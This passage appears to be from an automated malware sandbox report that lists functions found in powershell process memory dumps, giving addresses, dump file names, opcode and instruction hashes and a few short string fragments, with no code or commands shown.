                                                • Snapshot File: hcaresult_8_2_7ffaacd90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2889ec739c9ff9fb053df40ac79bc6d69dfcaaa883f45771596319e0324abd28
                                                • Instruction ID: 5e43607bc3ce8be8cb0bbcf3111d8b20d434fa748f70d163a01bf71519fc7e18
                                                • Opcode Fuzzy Hash: 2889ec739c9ff9fb053df40ac79bc6d69dfcaaa883f45771596319e0324abd28
                                                • Instruction Fuzzy Hash: B981F569A0F7868FF7A697684864574AFA1EF06200B5840FED46DCB8C3E91DDC0A83D1
                                                Function 00007FFAACBAE380 Relevance: .1, Instructions: 123COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1343129977.00007FFAACBAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffaacbad000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 723c49f5a46346e900314f37d5cfe28fd118d812f1f935e13c322be03ca12efc
                                                • Instruction ID: 7d9cff6d2bf5bcb70b72a3e8e6dc381a1695618a5b4391472c8f094f1d5c52c8
                                                • Opcode Fuzzy Hash: 723c49f5a46346e900314f37d5cfe28fd118d812f1f935e13c322be03ca12efc
                                                • Instruction Fuzzy Hash: 8641F07040EBC48FE7568B2898459523FF0EF52220B1545EFD0C8CB2A3D625E80AC792
                                                Function 00007FFAACCC97A8 Relevance: .1, Instructions: 112COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1343748747.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffaaccc0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 209b9b14369b1832c36b31c0a61b2ae77b3b27ef95e7c19acd4bcd3eeb6339c2
                                                • Instruction ID: 5b5faa4617e0aff507d02eca5bd7aac3a0a02bd97d5daf9fc9a2af18fa36ea4f
                                                • Opcode Fuzzy Hash: 209b9b14369b1832c36b31c0a61b2ae77b3b27ef95e7c19acd4bcd3eeb6339c2
                                                • Instruction Fuzzy Hash: 9031957091CA4C9FDB189B5C984AAA97BE0FB99321F00422FE44DD3251DB70A8568BC2
                                                Function 00007FFAACCCA64C Relevance: .1, Instructions: 101COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1343748747.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffaaccc0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 79061193efdd00814f2e8838ab20b22605ca9047270cf2a9db279b20673ccc28
                                                • Instruction ID: 06abefdbf4fd615930b6960aac986d729e049cf507cbdbd0debdbf546505d8f1
                                                • Opcode Fuzzy Hash: 79061193efdd00814f2e8838ab20b22605ca9047270cf2a9db279b20673ccc28
                                                • Instruction Fuzzy Hash: D421B67090C64C8FEB59DF6C984A7E97BF0EB96321F04416BD04DC3152DA74A45ACB91
                                                Function 00007FFAACCC33B5 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1343748747.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffaaccc0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                • Instruction ID: dab008755a60612cbb32ea5fd331c927475b9437b9f0d942dd88085dbf6fa95e
                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                • Instruction Fuzzy Hash: 1101447115CB088FD744EF0CE455AA6B7E0FB99364F10056DE58AC3661DA26E882CB45
                                                Function 00007FFAACD9414D Relevance: .0, Instructions: 37COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1344342404.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffaacd90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b1f047480c016bf23c0380f381a3fcd2a711ac9ce24112ed209b6173cb4ba4cc
                                                • Instruction ID: f6269558690e243bd0d30d0a140895782c1357792db40a4bd1e5d70759556ce4
                                                • Opcode Fuzzy Hash: b1f047480c016bf23c0380f381a3fcd2a711ac9ce24112ed209b6173cb4ba4cc
                                                • Instruction Fuzzy Hash: 43F09A32A0D5048FE7A9EB5CE4458A877F0EF5932071100BBE06DC79A3DA2AEC4487C0
                                                Function 00007FFAACD94400 Relevance: .0, Instructions: 35COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1344342404.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffaacd90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7a79e0805dbf647bdb5f35e87f187ded412c683418f20c959aa3e48b41f0f381
                                                • Instruction ID: 312e22fc7238a711a50084bacf58dabf6b1e64d2a8171fd8cfad1d97ba75a60d
                                                • Opcode Fuzzy Hash: 7a79e0805dbf647bdb5f35e87f187ded412c683418f20c959aa3e48b41f0f381
                                                • Instruction Fuzzy Hash: 0DF08272A0D5488FE765EB5CE4858A87BE0FF4532075500BAE15DC7863EB2AEC54C7D0
                                                Function 00007FFAACD941D1 Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1344342404.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffaacd90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                • Instruction ID: be26b27b53e70215dad335078112dd408faf4afa9225ead17aada7fd48e94315
                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                • Instruction Fuzzy Hash: 75E01A35B0C808CFEAA8DB0CE0409A977E1EB9933171141B7D15ED7A62DA36EC559BC0
                                                Function 00007FFAACCCA2C9 Relevance: .0, Instructions: 26COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1343748747.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffaaccc0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8e4febcda97eab6eebcc19c7ba151be875aeb834cf002efa9ce2a4982d2d886d
                                                • Instruction ID: da93813bd657cfc31e67307bad02fddd9c71d15afa0facb0b7b2abdea312f6d7
                                                • Opcode Fuzzy Hash: 8e4febcda97eab6eebcc19c7ba151be875aeb834cf002efa9ce2a4982d2d886d
                                                • Instruction Fuzzy Hash: 75E01275904A4C8F9B55DF18D8594E57FE0FB65205B00425AE41DC7120DB71D958CBC1

                                                Non-executed Functions

                                                Function 00007FFAACCC8BD0 Relevance: 6.4, Strings: 5, Instructions: 103COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1343748747.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffaaccc0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: M_^($M_^)$M_^7$M_^8$M_^<
                                                • API String ID: 0-462651446
                                                • Opcode ID: 56b15f09c4575ccd04bec19a4d28ada1a2ed8b4d93c9888784484bcfeaca7b69
                                                • Instruction ID: eeb796bfed8b4f6acd20562074b60d273c4be195b9fc5c6a9b61014549033b1f
                                                • Opcode Fuzzy Hash: 56b15f09c4575ccd04bec19a4d28ada1a2ed8b4d93c9888784484bcfeaca7b69
                                                • Instruction Fuzzy Hash: E431B4E3A184268D92027B7CB8499F83BD0DF5523578557F6E0DCCF483EE5860868688
                                                Function 00007FFAACCC89FA Relevance: 5.1, Strings: 4, Instructions: 128COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1343748747.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffaaccc0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: M_^$M_^$M_^$M_^
                                                • API String ID: 0-1397233021
                                                • Opcode ID: 371f41a825306395999708e01c1ef79a57c5908491e04dea20ed936d427315d0
                                                • Instruction ID: 77d031455f76965d0fdf5179d9c9938cb286ea38fb262a33c1ca09dcdc842b15
                                                • Opcode Fuzzy Hash: 371f41a825306395999708e01c1ef79a57c5908491e04dea20ed936d427315d0
                                                • Instruction Fuzzy Hash: A631A4E290E7C3CFF29B4B58585A0A23FD0EF63315B4952F2D08C868D3ED19564B42D1
                                                Function 00007FFAACCC8605 Relevance: 5.1, Strings: 4, Instructions: 93COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1343748747.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffaaccc0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: M_^$M_^$M_^$M_^
                                                • API String ID: 0-1397233021
                                                • Opcode ID: 59ce78c671d8565ae967933f0a531cb82bdf936f131853f3361d58e3ec446b40
                                                • Instruction ID: 68886dcb5426e61dede77e32c636b9851bdaf4b31da601fb3aa4ed8d591fd863
                                                • Opcode Fuzzy Hash: 59ce78c671d8565ae967933f0a531cb82bdf936f131853f3361d58e3ec446b40
                                                • Instruction Fuzzy Hash: 362195D390EBC2CFF2974769582E0A77FD0AF23219B4A41F6C09D465D3FD15A90A42D1

                                                Executed Functions

                                                Function 00007FFAACDA660A Relevance: .4, Instructions: 429COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1440312943.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffaacda0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d1c9413e867c4e29e61581084118b0df46e9fff6335ce6c55e617a05b480c921
                                                • Instruction ID: 1b6eb9f0362c2b04b2b53e382c3e42f7de90b45df0ed32648b97d3fb1791b4e8
                                                • Opcode Fuzzy Hash: d1c9413e867c4e29e61581084118b0df46e9fff6335ce6c55e617a05b480c921
                                                • Instruction Fuzzy Hash: D8C15A72A0EA8ACFF765EB7888155B5BBA0EF56710B0441FED45DC70D3DA18D80A83D1
                                                Function 00007FFAACDA664B Relevance: .3, Instructions: 254COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1440312943.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffaacda0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c0335ed0a35c348ab3980d01aa7d80018f324158f0ce45d66e44dad385b806c5
                                                • Instruction ID: daaf8a0dd5d9d244c2667670223a8938835638f9d6f0f2cf2cf290b73fdfa8dc
                                                • Opcode Fuzzy Hash: c0335ed0a35c348ab3980d01aa7d80018f324158f0ce45d66e44dad385b806c5
                                                • Instruction Fuzzy Hash: EB8104A6E1FA86CFF7A9DB684454574BA91EF16B00B4840FED45DCB0D3D918DC0A83D1
                                                Function 00007FFAACDA6633 Relevance: .2, Instructions: 239COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1440312943.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffaacda0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e76d059d44950185d4139d1d5df90649e51e12eea3940899b14555333f60cf55
                                                • Instruction ID: 66f1e85ff06cd5c5ec3a9dd2e20c838fbe43031e66ce88be2df2639df61ae1d4
                                                • Opcode Fuzzy Hash: e76d059d44950185d4139d1d5df90649e51e12eea3940899b14555333f60cf55
                                                • Instruction Fuzzy Hash: 407105A6E1FB86CFF7AA9B7844545346AA1EF16A00B5840FED45DCB0D3D918DC0A83D1
                                                Function 00007FFAACCD9770 Relevance: .1, Instructions: 135COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1439421351.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffaaccd0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e7b9a7a03761e9ce4c34fb217545669e5c783745ad2773ea54d544f0da55308
                                                • Instruction ID: 672f1cdf5bfacbe6a6b14aa1509cf2e1aabbcc5accb5eebf0d108180ba8a6e44
                                                • Opcode Fuzzy Hash: 2e7b9a7a03761e9ce4c34fb217545669e5c783745ad2773ea54d544f0da55308
                                                • Instruction Fuzzy Hash: 8841E77190CB888FEB199F5CAC466A97FE0FB95310F04416FE049D3292DA64A815CBC2
                                                Function 00007FFAACBBEE20 Relevance: .1, Instructions: 124COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1438603904.00007FFAACBBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffaacbbd000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 763ca212407bfd217b90df2362ec5f6cc4f33575852cce9887537d0f887d274e
                                                • Instruction ID: e3ac356d5f2ccf5e59b6f8f7b1427905346c94c42d795fed76c4d05f65b0f2b3
                                                • Opcode Fuzzy Hash: 763ca212407bfd217b90df2362ec5f6cc4f33575852cce9887537d0f887d274e
                                                • Instruction Fuzzy Hash: 0C41C27140EBC48FE7569B29D8519523FF0EF57320B1945EFE088CB1A3D625E84AC7A2
                                                Function 00007FFAACCDA49C Relevance: .1, Instructions: 99COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1439421351.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffaaccd0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 53b32f81eaa10b780040c03f50e671fad907bfac0c6822a09702f8618482ead6
                                                • Instruction ID: 769accf74c8fc6be022061103a96e5496698df0c41ddc14d3d7468b099571673
                                                • Opcode Fuzzy Hash: 53b32f81eaa10b780040c03f50e671fad907bfac0c6822a09702f8618482ead6
                                                • Instruction Fuzzy Hash: 0A21093190CB4C8FEB59DF6C984A7E97FE0EB96321F04816BD04DC3152D674A419C791
                                                Function 00007FFAACCD33B5 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1439421351.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffaaccd0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                • Instruction ID: c5fe5ef16c9603e2c38b2b8f18b6b479cf07841371c6c5dc00f7d796ae02029c
                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                • Instruction Fuzzy Hash: BB01847010CB088FD744EF0CE051AA5B3E0FB89320F10052EE58AC3661DA22E882CB41
                                                Function 00007FFAACCDA0FB Relevance: .0, Instructions: 42COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1439421351.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffaaccd0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 856b7f80f29d10d7987f50df223e5a92bff019c482e4491c884c31ddd48fb0c0
                                                • Instruction ID: 60eb7d7492f8e72ac6f8fc0a3d5c9452cfa221a11172759ca87fca6401e00c91
                                                • Opcode Fuzzy Hash: 856b7f80f29d10d7987f50df223e5a92bff019c482e4491c884c31ddd48fb0c0
                                                • Instruction Fuzzy Hash: 78F0F676519B8CCFEB46DF1CA8660E97F90FF66211B1401A7E04CC7161EB21881887C2
                                                Function 00007FFAACDA414D Relevance: .0, Instructions: 37COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1440312943.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffaacda0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ca527f838092f2b591c538ca95f2d51549fc776d758db85775f6ddec89ad8468
                                                • Instruction ID: c02153936c4385e9ddfc5b709c9d4968aa73670628c01ec93e05e018216bc038
                                                • Opcode Fuzzy Hash: ca527f838092f2b591c538ca95f2d51549fc776d758db85775f6ddec89ad8468
                                                • Instruction Fuzzy Hash: 21F0BE32A0D5048FE7A9EB5CE4458A877E0EF5932071100BBE06DC75A3CE29EC44C780
                                                Function 00007FFAACDA4400 Relevance: .0, Instructions: 35COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1440312943.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffaacda0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6f1fc3207d1d570644d8cb67ff433f65e516996217ce7e9c8c6c5948f4ff6775
                                                • Instruction ID: f71779aed83671236964146ccaac466008bb4c926185f6d4ed0fef192812e9e3
                                                • Opcode Fuzzy Hash: 6f1fc3207d1d570644d8cb67ff433f65e516996217ce7e9c8c6c5948f4ff6775
                                                • Instruction Fuzzy Hash: DFF0E272A0D5488FE765EB1CE4858A87BE0FF4532074100BAE05DC7463CB69FC44C780
                                                Function 00007FFAACDA41D1 Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1440312943.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffaacda0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                • Instruction ID: 43ea41e1f6c0a14adc3675a0c07277ec624c1149e27f531e8fd3b04f9800ceaa
                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                • Instruction Fuzzy Hash: BBE01A31B0C808CFEAA8DB0CE0409A977E1EBA933171151B7D15EC7561CA22EC559BC0

                                                Non-executed Functions

                                                Function 00007FFAACCD8BFA Relevance: 6.3, Strings: 5, Instructions: 91COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1439421351.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffaaccd0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: L_^5$L_^8$L_^F$L_^I$L_^K
                                                • API String ID: 0-3847582561
                                                • Opcode ID: 29bce9660e8502ad7bd2c320063eaed719f89a5c057029b8b031713abe4f3ab3
                                                • Instruction ID: b03e9b6cbcf809e185e0122594c1df6362a863fdc1a746159d10de827ffdc250
                                                • Opcode Fuzzy Hash: 29bce9660e8502ad7bd2c320063eaed719f89a5c057029b8b031713abe4f3ab3
                                                • Instruction Fuzzy Hash: 082104B7B141164E92017B7DB8059ED7B84CF84275349A2F2D39C8F513DF14608A8AD4

                                                Executed Functions

                                                Function 00007FFAACDB6605 Relevance: .4, Instructions: 439COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1587933750.00007FFAACDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacdb0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72d81e65faaab6d0d56e2ef39f3a9219423f8995d8e0180cecc620870ffd3625
                                                • Instruction ID: 46a2a026a850d676c795f87d2b66f7b7b638860af73c76f503e238f981c4691b
                                                • Opcode Fuzzy Hash: 72d81e65faaab6d0d56e2ef39f3a9219423f8995d8e0180cecc620870ffd3625
                                                • Instruction Fuzzy Hash: 5ED16B75A0E78A9FF769BB6888555B9BBA1EF16310B0401FEE45DC70D3DA14DC0A83C1
                                                Function 00007FFAACCEA9B8 Relevance: .3, Instructions: 291COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1586886114.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacce0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 91af913ae3d5cf0b2c9de9d959e7c618fefc9621b0ab5626ac36bc2748a4596c
                                                • Instruction ID: 38499ab48aebd2315153ec00356bec14d26664b9cae8ef6ea8571cc200f49e6c
                                                • Opcode Fuzzy Hash: 91af913ae3d5cf0b2c9de9d959e7c618fefc9621b0ab5626ac36bc2748a4596c
                                                • Instruction Fuzzy Hash: 19815CB250D7868FF3459B18D8964E17FE0FF5361A71841BAD0CDC7193ED15A84B8781
                                                Function 00007FFAACDB4073 Relevance: .2, Instructions: 185COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1587933750.00007FFAACDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacdb0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 54ca4bbbe2499b8261a5e663c5acb270393ed3bf09c153c1217f222bee17a78e
                                                • Instruction ID: d3640852400dae1c2f6b771841e94c6bf434795ee16dd2fe2cc09bd308439a76
                                                • Opcode Fuzzy Hash: 54ca4bbbe2499b8261a5e663c5acb270393ed3bf09c153c1217f222bee17a78e
                                                • Instruction Fuzzy Hash: 97511462F0EA4A8FF799CB2C88516747BD2EF96260B5841BBC15DC7193DE24EC098381
                                                Function 00007FFAACDB4370 Relevance: .1, Instructions: 147COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1587933750.00007FFAACDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacdb0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fe37fbf06854f72edd3a27f537b3cfa3d73877ccdc48483870c7c8be44d470e8
                                                • Instruction ID: 525acccfc53cb2e0aad21f857c4ea511024c96563ded2e997e81505e8e657706
                                                • Opcode Fuzzy Hash: fe37fbf06854f72edd3a27f537b3cfa3d73877ccdc48483870c7c8be44d470e8
                                                • Instruction Fuzzy Hash: 01413672B0EA498FF7A5D7689444AB4BBD1EF46220B4800FEC06DC7183EE18EC1883C1
                                                Function 00007FFAACBCEB80 Relevance: .1, Instructions: 125COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1585880347.00007FFAACBCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBCD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacbcd000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1f4bef75407860cc686c2d751846ff6e9ef1007c7d2f3a954f44f3173d402644
                                                • Instruction ID: 98125ef72d672227b71367888b26b41dba364d7bbb28292203567de88432ab14
                                                • Opcode Fuzzy Hash: 1f4bef75407860cc686c2d751846ff6e9ef1007c7d2f3a954f44f3173d402644
                                                • Instruction Fuzzy Hash: B041F57180EBC48FE7568B28D8959623FB0EF57320B1545EFD089CB1A3D625E84AC792
                                                Function 00007FFAACCE9778 Relevance: .1, Instructions: 120COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1586886114.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacce0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b814889ef08cd21b5fb810131f3b366f05d5b649a8e9bf34618a27901c14be25
                                                • Instruction ID: 40257829bcb1dc06aa30d1b3b22c7413e7181402c548ecfa86d7aa59c58b5efd
                                                • Opcode Fuzzy Hash: b814889ef08cd21b5fb810131f3b366f05d5b649a8e9bf34618a27901c14be25
                                                • Instruction Fuzzy Hash: BA31A57191CB4C9FDB189F5CA84A6E97BE0FB99311F00822FE449D3651CB74A8558BC2
                                                Function 00007FFAACCEA8CC Relevance: .1, Instructions: 118COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1586886114.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacce0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 73c3db381f3b74e5fa25e4c5e454a0f9d6f85fb3d6048934f21ad5c3f4b705da
                                                • Instruction ID: 7386006ccbc55e36e75128b1354af4bc4d195c7fc05cd63701349fd97b04d31c
                                                • Opcode Fuzzy Hash: 73c3db381f3b74e5fa25e4c5e454a0f9d6f85fb3d6048934f21ad5c3f4b705da
                                                • Instruction Fuzzy Hash: A731D57190DB888FEB59DB68984A6E97FE0EF67320F0481AFC04DC7152D665980ACB91
                                                Function 00007FFAACDB40BF Relevance: .1, Instructions: 98COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1587933750.00007FFAACDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacdb0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0a2eb5a376bfeabf986cfa8300784f11ac78828eb38e9dbc6e1581899b3bbfd4
